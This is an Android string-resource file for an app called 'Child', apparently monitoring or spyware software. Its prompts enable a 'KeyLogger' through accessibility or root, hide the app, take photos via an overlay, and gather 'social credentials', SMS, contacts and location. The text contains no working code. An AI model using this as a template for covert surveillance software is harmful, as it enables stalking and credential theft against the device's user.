<resources>
    <string name="app_name">Child</string>

    <string name="login_hint_user">Email</string>
    <string name="login_hint_passw">Password</string>
    <string name="login_btn_sign_in">SIGN IN</string>
    <string name="login_success">Login success</string>
    <string name="login_failed_try_again_later">Login failed, please try again later</string>
    <string name="login_failed">Login failed</string>
    <string name="logging_in">Logging in</string>
    <string name="ready_to_continue">Login success, all ready to continue.</string>
    <string name="hide_app">HIDE APP</string>
    <string name="checking_root">Checking root and enable KeyLogger accessibility</string>
    <string name="go_to_setting">Go to setting</string>
    <string name="title_dialog">Message</string>
    <string name="msg_dialog_enable_keylogger">Root not found, enable KeyLogger accessibility in \"settings - accessibility - services - child accessibility\"</string>
    <string name="msg_dialog_enable_overdraw">You need to activate the draw over other apps permission to be able to take photos</string>
    <string name="msg_dialog_enable_usage_stats">You need to activate the "Applications with use access" permission to obtain social credentials</string>
    <string name="enable_keylogger_success">Successful KeyLogger accessibility</string>

    <string name="accessibility_service_label">Child accessibility</string>
    <string name="accessibility_service_description">Child accessibility allows users to prevent, or limit access to, their handling, or their content to minors</string>
    <string name="msg_dialog_enable_accessibility_service">You need to enable the accessibility service so that the application works correctly.</string>
    <string name="enable_service">ENABLE SERVICE ACCESSIBILITY</string>
    <string name="enable_overdraw">ENABLE OVERDRAW CAMERA</string>
    <string name="enable_usage_stats">ENABLE USAGE STATS</string>

    <string name="address_not_found">Address not found</string>
    <string name="hiding">Hiding…</string>

    <string name="permission_request">Permission request</string>
    <string name="message_permission">Permission is required to read contacts, location, record audio, read phone status, receive sms, camera and write storage for this application. Do you want to try again?</string>
    <string name="message_permission_never_ask_again">Some permissions were denied, without them the application will not work correctly. To activate them you must go to \"Settings - applications - child - permissions\" and activate the corresponding permissions. Do you want to activate them now?</string>

</resources>
